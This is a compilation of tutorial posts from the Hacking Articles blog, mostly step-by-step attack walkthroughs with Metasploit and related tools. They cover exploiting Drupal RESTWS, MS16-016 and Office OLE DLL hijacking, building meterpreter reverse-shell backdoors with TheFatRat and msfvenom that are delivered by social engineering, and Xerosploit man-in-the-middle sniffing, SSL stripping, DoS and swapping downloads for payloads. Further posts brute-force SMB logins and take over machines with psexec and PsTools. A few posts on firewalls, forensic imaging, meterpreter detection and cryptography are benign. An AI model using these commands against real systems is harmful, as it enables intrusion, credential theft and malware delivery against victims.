Firewall: It is a computer system or network that is designed to block unauthorized access while permitting outward communication. Firewall holds a lot of importance our technical world as it assures our system’s as well as data’s security. And a firewall in a network helps us to secure the whole network. It acts as a network security device that grants or rejects network access to traffic flows between untrusted zones. Thus, importance of Firewall.

To secure a network we should always use a third party firewall instead of windows own firewall as it make configuration of all network easy and in one system only. If you will use windows own firewall you have to configure if PC by PC which will take a lot of your time.

Setting up a firewall can be complicating. Therefore in this article we will learn how to set up a firewall using PFSense. By setting this firewall we will create a wall between our networks which will delude our network into two parts i.e External network and internal network.

You can download ISO image for PFSenese from here:

Now that you have ISO image, setup PFSense in your virtual machine just like you setup your windows and turn its power on and PFSense will open:

And it will boot itself automatically in few seconds:

Once it’s rebooted, select accept these Settings.

From the next dialogues box select Quick/Easy Install.

When you click on ok it will allow installation process to begin without asking unnecessary questions:

And the installation begins:

Now for installing custom configuration select Standard Kernel option.

And it will start installing:

Now, select Reboot option so that the firewall can start.

Thus, rebooting will begin.

After the rebooting process, it will ask you if you want to setup VLAN’s. Here just type n for no and hit enter.

Now it will ask you to name WAN and LAN interface. Give le0 name to WAN and le1 to LAN. Then just hit enter when it asks you to name optional interface.

It will show you the interfaces and their name now and will require your permission to proceed. Press y for yes as you are permitting it to proceed.

Now, in the following image you can see that it has automatically taken IP address for WAN i.e 192.168.1.7, if you wish to set a desired IP for WAN then choose 2 option and press 1 for the configuration of WAN.

It will ask you that if you want to assign IPv4 IP address. Here, press n for no. When you hit enter it will ask you if you want to assign IPv4 IP address. Here, enter your desired IP address and press enter. Then it will ask you to give subnet mask for the IP address that you have just entered. Now as our IP address was of C-class we will give 24 as subnet mask. After hitting enter it will ask you if you u want to give upstream gateway. Here, just press enter. And when it asks you to set IPv6 via DHCP6 then simply press enter without typing anything else as we do not require IPv6. And when it asks you for HTTP web configuration press n for no.

You can see that your desired IP for WAN has been set up. Hit enter to continue.

Similarly, you can setup LAN IP address by selecting of 2 for assigning IP address and select 2 for LAN.

Just like before, it will ask you for the IP address of LAN and so you enter your LAN IP address. And then it will ask you for subnet mask, here we have given subnet mask of 8 as our IP is of A-class. Just hit enter when it asks you to enter upstream gateway. And also hit enter when it asks you to enter IPv6 as we do not require it. And then press y for HTTP revert option.

And just like this, your LAN IP address has been set up. Now, press enter to continue.

Now to check that your firewall has been configured properly, let’s ping an IP address. Select option 7 and enter the IP address you want to ping. If it successfully pings that means your firewall has been configured successfully. And you can press enter to continue.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post Firewall Pentest Lab Setup with pfsense in VMware appeared first on Hacking Articles.

This module exploits a Remote PHP Code Execution vulnerability in Drupal RESTWS Module. Unauthenticated users can execute arbitrary code under the context of the web server user. RESTWS alters the default page callbacks for entities to provide additional functionality. A vulnerability in this approach allows an unauthenticated attacker to send specially crafted requests resulting in arbitrary PHP execution. RESTWS 2.x prior to 2.6 and 1.x prior to 1.7 versions are affected by issue. This module was tested against RESTWS 2.5 with Drupal 7.5 installation on Ubuntu server.

 Exploit Targets

RESTWS 2.x

Requirement

Attacker: kali Linux

Victim PC: drupal

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/drupal_restws_exec

msf exploit (drupal_restws_exec)>set targeturi /

msf exploit (drupal_restws_exec)>set rhost 192.168.0.4 (IP of Remote Host)

msf exploit (drupal_restws_exec)>set rport 80

msf exploit (drupal_restws_exec)>exploit

The post Hack Drupal Website using Drupal RESTWS Module Remote PHP Code Execution appeared first on Hacking Articles.

TheFatRat is an easy tool for generate backdoor with msfvenom ( part of metasploit framework ) and program compiles a C program with a meterpreter reverse_tcp payload In it that can then be executed on a windows host Program to create a C program after it is compiled that will bypass most AV

First, to install thefatrat we type the following command on terminal:

git clone https://github.com/Screetsec/TheFatRat.git

Once the cloning is done, go to the installed directory of fatrat and open it in terminal and type the following command to start it:

 ./fatrat

It will show you many options now select option 1 which is to CREATE BACKDOOR WITH MSFVENOM.

Now it will give a list of options to choose the format of the backdoor which you have to choose as per your requirements and need. To create a windows executable as a backdoor choose option 2.

Now enter the LHOST IP i.e. your system IP and LPORT i.e. the port you want the reverse connection on your i.e. attacker system. In my case the LHOST is 192.168.0.104 and LPORT is 4444.

And then exit the script by selecting y when asked

Now the generated backdoor will be present in the output directory.

Now use any trick up your sleeve to transport the backdoor to the victim and set up reverse handler on metasploit with the following commands on the msf terminal-

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.104 (the attacker system IP)

set lport 4444

exploit

Now as soon as the backdoor is executed on the victim’s machine you will get a meterpreter shell as you can see in my case.

For More Details Visit here

Author: Himanshu Gupta is a Information Security Researcher | Technical writer. You can follow him on LinkedIn .

The post Hack Remote Windows 10 PC using TheFatRat appeared first on Hacking Articles.

Xerosploit is a penetration testing toolkit whose goal is to perform man in the middle attacks for testing purposes. It brings various modules that allow realising efficient attacks, and also allows carrying out denial of service attacks and port scanning. Powered by bettercap and nmap

First of all the github repo with command:

git clone https://github.com/LionSec/xerosploit.git

Now install xerosploit by running the python script in cloned folder with command:

./install.py

Now run xerosploit with command:

xerosploit

Now run the following command on xerosploit console to know the initial commands:

help

And now scan the network for connected devices with command:

scan

Now enter the IP of the targeted system on the terminal.

Now enter help command on the console to view all the available modules

We will be using the 4 modules in this article:

DRIFTNET

First of all we will use driftnet module to capture all the images the victim is surfing on the web with following commands:

driftnet

run

All the captured images will be saved in the /opt/xerosploit/xedriftnet directory.

REPLACE

Now we will use a replace module to replace the all the images on the victim’s web browser with command:

replace

And then to execute the module enter command:

run

And then give the path to the image file you want to be replaces with.

Hit ctrl^c to stop the attack.

As you can see the images on the victim’s browser are replaced with our image.

SNIFF

Now run the following module to sniff all the traffic of the victim with command:

sniff

and then enter the following command to execute that module:

run

Now it will ask you if you want to use SSLTRIP to strip the HTTPS URl’s to HTTP so that we can the catch the login credentials in clear text. So enter y.

Now it will open a separate terminal in which we can see all the credentials in clear text. As you can see it has successfully captured the login credentials.

DOS

Now we will dos (denial of service) the victim’s system with module dos which will cause the target unresponsive, so run commands:

dos

run

Hit ctrl^c to stop the attack

The post Perform Man in the Middle Attack in Network using Xerosploit appeared first on Hacking Articles.

This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn a process on the target system and elevate it’s privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Open Kali terminal type msfconsole

Now type use exploit/windows/local/ms16_016_webdav

msf exploit (ms16_016_webdav) set session 1

msf exploit (ms16_016_webdav)>exploit

The post Get Admin Access of Remote Windows PC using MS16-016 mrxdav.sys WebDav Escalation appeared first on Hacking Articles.

This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. Currently supports DLLs and Powershell.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/smb/smb_delivery

msf exploit (smb_delivery)>set srvhost 192.168.1.101 (IP of Local Host)

msf exploit (smb_delivery)>set srvport 445

msf exploit (smb_delivery)>exploit

Now, we have to copy the rundll32.exe code generated in victim’s run bar on PC using social engineering method.

As soon as we do that, we will get access of victim’s PC.

Now type sessions –i to display sessions opened when the victim opens the link

Now the session has opened type sysinfo to get system information, then type shell to enter into Victims command prompt.

The post Hack Remote Windows PC using DLL Files (SMB Delivery Exploit) appeared first on Hacking Articles.

Download

Password: www.hackingarticles.in

The post Game Hacking: Developing Autonomous Bots for Online Games appeared first on Hacking Articles.

Enumerate all logged on users

 This module will enumerate current and recently logged on Windows users.

msf > use post/windows/gather/enum_logged_on_users

msf post(enum_logged_on_users) > set session 1

msf post(enum_logged_on_users) > exploit

Gather All Group Policy Preference 

This module enumerates the victim machine’s domain controller and connects to it via SMB. It then looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts them using Microsoft’s public AES key. Cached Group Policy files may if the group policy object is deleted rather than unlinked. Tested on WinXP SP3 Client and Win2k8 R2 DC.

msf > use post/windows/gather/credentials/gpp

msf post(gpp) > set session 1

msf post(gpp) > exploit

Find All DNS Service Records

Enumerates know SRV Records for a given domain using target host DNS query tool.

msf > use post/multi/gather/dns_srv_lookup

msf post(dns_srv_lookup) > set domain rajlab.com

msf post(dns_srv_lookup) > set session 1

msf post(dns_srv_lookup) > exploit

Find All Services in Server

This module will query the system for services and display name and configuration info for each returned service. It allows you to optionally search the credentials, path, or start type for a string and only return the results that match. These query operations are cumulative and if no query strings are specified, it just returns all services. NOTE: If the script hangs, windows firewall is most likely on and you did not migrate to a safe process (explorer.exe for example)

msf > use post/windows/gather/enum_services

msf post(enum_services) > set session 1

msf post(enum_services) > exploit

Find All Active Directory TCP sessions

 This Module lists current TCP sessions.

msf > use post/windows/gather/tcpnetstat

msf post(tcpnetstat) > set session 1

msf post(tcpnetstat) > exploit

Find All Installed Application in Server

 This module will enumerate all installed applications

msf > use post/windows/gather/enum_applications

msf post(enum_applications) > set session 1

msf post(enum_applications) > exploit

Find All Remote Desktop Session

 This module dumps MRU and connection data for RDP sessions.

msf > use post/windows/gather/enum_termserv 

msf post(enum_termserv) > set session 1

msf post(enum_termserv) > exploit

The post Penetration Testing in Active Directory using Metasploit (Part 2) appeared first on Hacking Articles.

In Hacking, Ports and Protocols play a major role as hacking is not possible without them. And to work with them, let us first understand ports and protocols.

In information technology, a protocol is the special set of rules that end points in a telecommunication connection use when they communicate. Protocols specify interactions between the communicating entities. So, basically, Network protocols are the language of rules and conventions used for handing communicated between network devices and ensuring the optimal operation of a network. Network protocols include key internet protocols such as IP and IPv6 as well as DNS and FTP, and it also includes more network-specific protocols like SNMP and NTP.

In the internet protocol suite, a port is an endpoint of communication in an operating system. A port in computer networking is a logical access channel for communication between two devices. Bi-directional communications and more complex connections may use multiple ports (channels) simultaneously. It is always associated with an IP address of a host and the protocol type of the communication, and thus completes the destination or origination address of a communication session.

A port is identified for each address and protocol by a 16-bit number, commonly known as the port number.

This understood Ports and Protocols. Now, to work with SMB protocol, let us understand it.

SMB:  Server Message Block, the modern dialect of which was known as Common Internet File System, operates as an application-layer network protocol for file sharing  that allows applications on a computer to read and write to files and to request services from server programs in a computer network. The SMB protocol can be used on top of its TCP/IP protocol or other network protocols. Using the SMB protocol, an application (or the user of an application) can access files or other resources at a remote server. This allows applications to read, create, and update files on the remote server. It can also communicate with any server program that is set up to receive an SMB client request.

Presently, the latest version of SMB is the SMB 3.1.1 which was introduced with Windows 10 and Windows Server 2016. This version supports AES 128 GCM encryption in addition to AES 128 CCM encryption added in SMB3, and implements pre-authentication integrity check using SHA-512 hash. SMB 3.1.1 also makes secure negotiation mandatory when connecting to clients using SMB 2.x and higher.

Working of SMB: SMB functions as a request-response or client-server protocol. The only time that the protocol does not work in a response-request framework is when a client requests an opportunistic lock (oplock) and the server has to break an existing oplock because the current mode is incompatible with the existing oplock. Client computers using SMB connect to a supporting server using NetBIOS over TCP/IP, IPX/SPX, or NetBUI. Once the connection is established, the client computer or program can then open, read/write, and access files similar to the file system on a local computer.

SMB Protocol Security: The SMB protocol supports two levels of security. The first is the share level. The server is protected at this level and each share has a password. The client computer or user has to enter the password to access data or files saved under the specific share. This is the only security model available in the Core and Core plus SMG protocol definitions. User level protection was later added to the SMB protocol. It is applied to individual files and each share is based on specific user access rights. Once a server authenticates the client, he/she is given a unique identification (UID) that is presented upon access to the server. The SMB protocol has supported individual security since LAN Manager 1.0 was implemented.

In metaslpoit, there are very simple commands to know if the remote host or remote PC supports SMB or not.

SMB 2.0 Protocol Detection

Detect systems that support the SMB 2.0 protocol

use auxiliary/scanner/smb/smb2

msf exploit (smb2)>set rhosts 192.168.0.104

msf exploit (smb2)>set rport 445

msf exploit (smb2)>exploit

Once you hit enter after exploit, you will see the result providing you with al the information about the opened SMB Protocol.

SMB Version Detection

Display version information about each system

use auxiliary/scanner/smb/smb_version

msf exploit (smb_version)>set rhosts 192.168.0.104

msf exploit (smb_version)>exploit

After the command has been run, it will inform you about the version of SMB running on our remote PC.

SMB Share Enumeration

This module determines what shares are provided by the SMB service and which ones are readable/writable. It also collects additional information such as share types, directories, files, time stamps, etc. By default, a netshareenum request is done in order to retrieve share information, but if this fails, you may also fall back to SRVSVC.

use auxiliary/scanner/smb/smb_enumshares

msf exploit (smb_enumshares)>set rhosts 192.168.0.104

msf exploit (smb_enumshares)>smb smbuser raj

msf exploit (smb_enumshares)>smb passuser raj

msf exploit (smb_enumshares)>exploit

And so, after the execution of the command the result will be displayed. Some of the access is denied a most of the systems that are probed. Passing user credentials to the scanner will produce much different results.

SMB User Enumeration (SAM EnumUsers)

Determine what local users exist via the SAM RPC service

use auxiliary/scanner/smb/smb_enumusers

msf exploit (smb_enumusers)>set rhosts 192.168.0.104

msf exploit (smb_enumusers)>smb smbuser raj

msf exploit (smb_enumusers)>smb passuser raj

msf exploit (smb_enumusers)>exploit

As the command executes we can see that it has provided us with the list of users of our remote PC.

SMB SID User Enumeration (LookupSid)

Determine what users exist via brute force SID lookups. This module can enumerate both local and domain accounts by setting ACTION to either LOCAL and DOMAIN

 use auxiliary/scanner/smb/smb_lookupsid

msf exploit (smb_lookupsid)>set rhosts 192.168.0.104

msf exploit (smb_lookupsid)>smb smbuser raj

msf exploit (smb_lookupsid)>smb passuser raj

msf exploit (smb_lookupsid)>exploit

And so, you can find all the users which you never even knew that existed.

Now that you scan your remote PC’s IP with nmap you will see that these ports were opened through which you gathered all the desired information.

nmap -sV 192.168.0.104

And in the result, as above, you can see that Ports 445, 139 were infecting open.

Conclusion: Understanding a port and finding such things through a given port helps us to exploit our victim much more accurately as gather the most minute piece of information. Collecting such information about a port and knowing what to do with it give the exploiter certain power of manipulation. Therefore, understanding a port and what it can do and how to find information about it on our remote PC helps us improve our hacking skills as this is the foundation of hacking.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post Penetration Testing in SMB Protocol appeared first on Hacking Articles.

Previously we have learned all about the port SMB and how to identify its working on the remote host. To read that click here

In this article, we will learn how to gain control over our victim’s PC through SMB Port. There are various ways to do it and let take time and learn all those because different circumstances call for different measure.

SMB Login Check Scanner

This module will test a SMB login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Once the metasploit opens type:

use auxiliary/scanner/smb/smb_login

msf exploit (smb_login)>set user_file  /root/Desktop/user.txt

msf exploit (smb_login)>set set pass_file /root/Desktop/pass.txt

msf exploit (smb_login)>set set rhost 192.168.0.104

msf exploit (smb_login)>set set rport 445

msf exploit (smb_login)>set exploit

Here,

auxiliary/scanner/smb/smb_login –> is a module we will use to attempt to login

/root/Desktop/user.txt –> is the path of text file which is the resident of all the possible usernames.

/root/Desktop/pass.txt –> is the path of text file in which all the possible passwords resides.

Once the commands are executed as you can see in the above image that it will start applying the dictionary attack and so you will have the right username and password in no time.

xHydra

This is the graphical version to apply dictionary attack via SMB port to hack a system. For this method to work:

Open xHydra in your kali. And select Single Target option and their give the IP of your victim PC. And select smb in box against Protocol option and give the port number 445 against the port option.

Now, go to Passwords tab and select Username List and give the path of your text file, which contains usernames, in the box adjacent to it.

Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

After doing this, go to Start tab and click on Start button on the left.

Now, the process of dictionary attack will start. Thus, you will attain the username and password of your victim.

Hydra

This is one command method and works efficiently with not much work. This method works in the terminal of kali. Therefore, open the terminal in your kali and type:

hydra -l raj -P /root/Desktop/pass.txt 192.168.0.104 smb

Here,

-l –>denotes the username

-P –> is to denote the path of password

/root/Desktop/pass.txt –> path of password file

And so, with just the working of one command we have password and username of our victim.

Ncrack

This too is a one command method which also works in terminal of kali. Go to your terminal and type:

ncrack -user raj -P /root/Desktop/pass.txt 192.168.0.104:445

Here,

 -user –> denotes the username

raj –> is the username

-P –> denotes password file’s path

/root/Desktop/pass.txt –> is the path of password file

445 –> is the port number

And so, with little work we can attain the password and username of our victim’s PC. Hence, all the methods to hack a system through SMB port which is used for file sharing

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post 4 Ways to Hack SMB Login Password appeared first on Hacking Articles.

To understand what is SMB protocol, click here

To know how collect username and passwords to your remote host via SMB protocol, click here

In this article, we will learn how to exploit your remote PC once you have collected username and password to your victim’s PC. There are four ways to do so and they all are listed below:

Microsoft Windows Authenticated User Code Execution

This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the “psexec” utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.

 msf > use exploit/windows/smb/psexec

msf exploit(psexec) > set rhost 192.168.0.104

msf exploit(psexec) > set rport 445

msf exploit(psexec) > set smbuser administrator

msf exploit(psexec) > set smbpass Ignite@123

msf exploit(psexec) > exploit

Here,

rhost –> IP of victim PC

rport –> port through which we are attacking

smbuser –> username

smbpass –> password

Once the commands run you will gain a meterpreter session of your victim’s PC and so you can access it as you want.

Microsoft Windows Authenticated Powershell Command Execution

This module uses a valid administrator username and password to execute a powershell payload using a similar technique to the “psexec” utility provided by SysInternals. The payload is encoded in base64 and executed from the commandline using the –encoded command flag. Using this method, the payload is never written to disk, and given that each payload is unique, is less prone to signature based detection. A persist option is provided to execute the payload in a while loop in order to maintain a form of persistence. In the event of a sandbox observing PSH execution, a delay and other obfuscation may be added to avoid detection. In order to avoid interactive process notifications for the current user, the psh payload has been reduced in size and wrapped in a powershell invocation which hides the window entirely.

 msf > use exploit/windows/smb/psexec_psh

msf exploit(psexec_psh) > set rhost 192.168.0.104

msf exploit(psexec_psh) > set rport 445

msf exploit(psexec_psh) > set smbuser administrator

msf exploit(psexec_psh) > set smbpass Ignite@123

msf exploit(psexec_psh) > exploit

Once again as the commands run you will gain a meterpreter sesion of victim’s PC. And therefore, you can do as you desire.

Atelier Web Remote Commander

This is graphical software that let us gain control of victim’s PC that too quite easily.

Once you have open the software give the IP address of your victim’s PC in remote host box along with the username and password in their respective boxes. And then click on connect; the whole victim’s PC’s screen will appear on your Desktop and you will have pretty good view of what your victim is doing.

Psexec.exe

Psexec.exe is software that helps us to access other computers in a network. This software directly takes us to the shell of the remote PC with advantage of doing nothing manually. Download this software from –> http://download.sysinternals.com/files/PSTools.zip.

Unzip the file once you have downloaded it. Go to you command prompt and type:

\\192.168.0.106 -u administrator -p Ignite@123 cmd

Here,

192.168.0.106 –> is the IP of remoste host

-u –> denotes username

-p –> denotes password

cmd –> to enter victim’s command prompt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post 4 ways to Connect Remote PC using SMB Port appeared first on Hacking Articles.

In Forensic, to investigate a hard drive or disks we always make a forensic image. A Forensic Image is a forensically sound and complete copy of a hard drive or other digital media, generally intended for use as evidence. Copies include unallocated space, slack space, and boot record.  Many computer forensic programs, especially the all-in-one suites, use their own file formats to store information. These images are stored in a format of RAW file or AFF or E01.

RAW Image Format: This format is a RAW bit-by-bit copy of the original. It is often accompanied by Meta data stored in separate formats. This Image Format is most common used and is read by every Forensic tool in the industry.

Once the RAW image is created, it can’t be read unless it is mounted by a tool. Mount is the process that will take the raw logical image and mount it onto a specified directory of choice to be able to examine the contents of that image. The image has to include be a recognizable file system as a partition. This makes invocation of the command interesting as the raw image is a physical disk image and not a specific partition of a file system.

Mount an image for a read-only view that leverages to see the content of the image exactly as the user saw it on the original drive.

There are various methods to mount a RAW file. But before we learn how to mount our RAW files, just have look on your my computer so that you can have a idea about how many drives you have before mounting a RAW file. For instance, following is the image of my computer of my PC:

Now, Let us have a look on these methods :

Forensic Tool Kit Imager

FTK Imager (version – 3.4.2) is tool introduced by Access Data which is used to preview data. It is also an imaging tool that lets us acquire in a forensically sound way. FTK helps us to create forensic images, Mount an image for a read-only view, Create hashes of files, etc and right now we will focus on its Mount function. To mount a RAW image file via FTK, first of all download FTK from –> http://accessdata.com/product-download/digital-forensics/ftk-imager-version-3.4.2

Now that FTK is downloaded and installed, open it and click on Files on the menu bar. A drop down menu will appear, from this menu click on Image Mounting.

A dialogue box will open now. Give the path of RAW file in Image File option and click on Mount button.

Once you click on Mount button your image will be mounted and you can see result in Mapped images:

OSFMount

OSFMount (version – 1.5.1015) is software by PassMark Software’s. It helps you mount your image files even your hard disk image file in windows with a drive letter. You can then analyze the disk image files further. For your original files not to be altered, the image files are mounted as read only by default. Download this software from –> http://www.osforensics.com/tools/mount-disk-images.html

Open OSFMount after the instalation is completed open it:

Go to File menu and select Mount new virtual disk option.

Dialogues will open; here give the path of your image file under the heading Image file and click on OK.

You can see in the following image that your RAW image will be mounted as a result:

Mount Image Pro

Get Data is a software development company that has launched Mount Image Pro (version – 6). It is a computer forensic tool which enables us to mount an image for forensic purpose. You can download this software from http://www.mountimage.com/

Open the software after its installation.

Go to File menu and click on Mount Image File.

A dialogue box will open and select your image file from it.

And then another dialogue box will open informing you with all the details. Click on OK.

It will further show you the progress in another dialogue box.

And as the outcome you can see that your image file will mount as shown in following image:

Now, as i had asked you to check you’re my computer before mounting the image, similarly, you can again check my computer and you will an extra drive as shown below:

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post 3 Ways to Mount a RAW Image in Windows appeared first on Hacking Articles.

In this article we will learn about that how we can change an on-going downloading file with your metasploit’s payload in your victim’s PC. That means if your victim is about to download an .exe file then you can change it with your payload (.exe). Hence hacking the victim without his/her knowing.

We will achieve the said with the help of Xerosploit. To know all about Xerosploit click here but first we will make you payload using msfvenom.

Now make your msfvenom payload. Here, we have made a payload named putty as we have taken putty as an example for our practical:

Msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.1.121 lport=8443 –f exe > /root/Desktop/putty.exe

Once your payload is created, save it on your desktop and open Xerosploit in the terminal of your kali and type Xerosploit to run it.

Once Xerosploit starts, type help command for that it will show all the basic commands to you. And then type scan and press enter so that you can see all the IP addresses in your network.

Once Xerosploit starts, type help command for that it will show all the basic commands to you. And then type scan and press enter so that you can see all the IP addresses in your network.

Choose you target and type its IP, so that now it has been targeted. Then again type help to see all the command your can now use.

Now type rdownload as it will help us to achieve our goal. After typing rdownload it will ask you to type run, therefore, type run next.

In the next step it will ask you to give the extension of files which you want to replace. For example we have taken .exe extension as we want to replace all the exe files that victim will download.

Then it will ask you to give it the path of the file which will replace victim’s file. For instance our payload’s name was putty.exe and it was reserved on Desktop so we gave path: /root/Desktop/putty.exe

After giving the path, simply press enter

Now you can see that as our victim is trying to download putty but instead our payload will be downloaded. Thus, the victim will be hacked.

Now that downloading of putty is started, it is asking us to save the downloaded file (which, for victim, is putty as he/she desired to download) and so he/she will obviously save the file.

Now that the victim’s part is done, we will open metasploit through our terminal and use multi/handler exploit to obtain the session.

Therefore, open metasploit by typing msfconsole on your terminal of kali and type:

msf exploit(handler)>use exploit/multi/handler

msf exploit(handler)>set payload windows/meterpreter/reverse_tcp

msf exploit(handler)>set lhost 192.168.1.121

msf exploit(handler)>set lport 8443

msf exploit(handler)>exploit

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post A New Way to Hack Remote PC using Xerosploit and Metasploit appeared first on Hacking Articles.

PS Tools Kit is a collection of 13 tools developed by Mark Russinovich. These tools are command-line tool that lets you execute processes on remote systems and redirect console applications’ output to the local system so that these applications appear to be running locally. All of these are special tools that are compatible with the NT windows version or later. Being a console application, these tools can work on both local computer and remote host. These tools require no manual installation of software on the remote system, and they let you specify alternative credentials to access the remote system. The “Ps” prefix in PsList relates to the fact that the standard UNIX process listing command-line tool is named “ps”, so this prefix has been adopted for all the tools in order to tie them together into a suite of tools named PsTools.

You can download PSTool Kit from –> https://technet.microsoft.com/en-us/sysinternals/pstools.aspx

Listed below are all tools in the said tool kit:

• PsExec – execute processes remotely
• PsFile – shows files opened remotely
• PsGetSid – display the SID of a computer or a user
• PsInfo – list information about a system
• PsPing – measure network performance
• PsKill – kill processes by name or process ID
• PsList – list detailed information about processes
• PsLoggedOn – see who’s logged on locally and via resource sharing (full source is included)
• PsLogList – dump event log records
• PsPasswd – changes account passwords
• PsService – view and control services
• PsShutdown – shuts down and optionally reboots a computer
• PsSuspend – suspends processes

Let us now learn how we will use these through command prompt one bye one

Firstly, let us open PSTool Kit and to do so open your command prompt and open PSTool kit using cd command as shown below :

Once you have open PSTool kit, run dir command so that you can see the list of al tools.

Now, we run a command that will help us use PSGetsid tool in the Tool Kit. The command is:

PSGetsidc64.exe \\192.168.1.104 -u administrator -p Ignite@123

Here,

192.168.1.104 –> our victim’s IP

-u –> denotes username

Administrator –> username

-p –> denotes password

Ignite@123 –> password

Executing these commands informs us about the SID of our victim’s PC.

Next, we will learn about psinfo.exe tool which gives us all the necessary information of the remote PC. To make this tool work type:

psinfo.exe \\192.168.1.104 -u administrator -p Ignite@123

After this command has been run, it will give you the information as you can see above.

Moving forward, we will now make psfile tool work by typing the following command:

psfile64.exe \\192.168.1.104  -u administrator -p Ignite@123

Execution of this command will help us to see every file and directories that are remotely open on the PC of victim.

Our next tool is pslist and to make it work type:

pslist64.exe \\192.168.1.104 -u administrator -p Ignite@123

This command lets us see the list of all the files on our remote PC as seen above.

Our next command is Psservice.exe which lets us know about all the services running on our victims’ PC. The command is:

PsService64.exe \\192.168.1.104 -u administrator -p Ignite@123

You can result in the above pic.

One of these tools helps us to see the logs of victim PC. That tool is psloglist.exe and the command to run this tool is:

psloglist.exe \\192.168.1.104 -u administrator -p Ignite@123

So, like this our command is successful as we have our desired result.

Now, pspasswd64.exe is the most important tool as it lets us to change the password of a PC. And the command to achieve this is:

pspasswd64.exe \\192.168.1.104 -u administrator -p ignite@123 administrator forever

Here,

192.168.1.104 –> our victim’s IP

-u –> denotes username

Administrator –> username

-p –> denotes password

Ignite@123 –> password

Administrator –-> username (which we have to give again to specify that which user’s password we want to change)

This can successfully change the password as shown in above image.

Another important tool is PsExec64.exe which takes us directly in the shell of victim’s PC. Its command is:

PsExec64.exe \\192.168.1.104 -u administrator -p forever cmd

Lastly our next tool helps us to shutdown remote PC. And for that just type:

psshutdown.exe \\192.168.1.104 -u administrator -p forever

And as shown in the image above the remote PC will shutdown in 20 seconds.

So, these were tools in the PSTool kit and the commands to run them. These tools make our work a lot easy and come in handy.

PS –> If you come across such dialogue box then always click on AGREE or else the above commands will not work. The image of dialogue box is shown below

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post Control Remote PC using PSTools appeared first on Hacking Articles.

Anti-metasploit is an article to know about how can you detect if you are hacked by someone through metasploit or not. Today, most of the time we stumble upon the ways about how we can be hacked or how to hack someone but no one tells you that how to detect if you are hacked.

So, therefore, in this article we will learn how to detect of you are hacked someone through metasploit. And to this there are two tools :

• Antipwny
• Antimeter

Both of these tools will help us to achieve our goal. These tools help you kill the meterpreter session that your hacker has gained. You can download these tools from –>

http://www88.zippyshare.com/v/t6FjCuTR/file.html

Antipwny

When you will double click on the software, a dialogue box will open and it will show the meterpreter file running in your computer as show :

Now, right click on the process and select kill process option.

And so you can detect the file and stop it too in just two simple steps.

Antimeter

When you open this software, it will scan the whole computer and it show the virus containing file. Also, it will ask you to kill the process or not. So, you type y for yes and the process will die.

Thus, the ways to detect if you have been hacked. These tools does not only allow us to detect the file but helps us to kill it also that too in two simple steps. When the steps are completed your hacker will loose the session making you safe and secure. So go on and raise your head against these exploiting hackers.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post How to Detect Meterpreter in Your PC appeared first on Hacking Articles.

Multiple DLL side loading vulnerabilities were found in various COM components. These issues can be exploited by loading various these components as an embedded OLE object. When we instantiate a vulnerable object, Windows will try to load one or more DLLs from the current working directory. If an attacker convinces the victim to open a specially crafted (Office) document from a directory also containing the attacker’s DLL file, it is possible to execute arbitrary code with the privileges of the target user. This can potentially result in the attacker taking complete control of the affected system.

Exploit Targets

MS Office 2007

MS Office 2010

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/office_ole_multiple_dll_hijack

msf exploit (office_ole_multiple_dll_hijack)>set payload windows/meterpreter/reverse_tcp

msf exploit (office_ole_multiple_dll_hijack)>set lhost 192.168.0.105 (IP of Local Host)

msf exploit (office_ole_multiple_dll_hijack)>exploit 

After we successfully generate the malicious dll and ppsx File, it will stored on your local computer

/root/.msf4/local

COMServices.ppsx is the file that you will zip and send to victim using various Social Engineering Technique that we have studied in previous articles.

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.105

exploit

Now send your malicious PPT files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

The post Hack Remote Windows PC using Office OLE Multiple DLL Hijack Vulnerabilities appeared first on Hacking Articles.

Cryptography is conversion of plain readable text into unreadable form. In cryptography first the data is converted into cipher text (that is encryption) and then the cipher text is converted back into readable form (that is decryption). Cryptography basically works on the concept of encryption and decryption. Encryption and decryption should not be confused with encoding and decoding, in which data is converted from one form to another but is not deliberately altered so as to conceal its content. Encryption is achieved through the algorithms. These algorithms are works with logic, mathematic calculations and its complexities.

Hash Function is most important function in Cryptography. A hash means a 1 to 1 relationship between data. This is a common data type in languages, although sometimes it’s called a dictionary. A hash algorithm is a way to take an input and always have the same output, otherwise known as a 1 to 1 function. An ideal hash function is when this same process always yields a unique output. So you can tell someone, here is a file, and here is its md5 hash. If the file has been corrupted during then the md5 hash will be a different value.

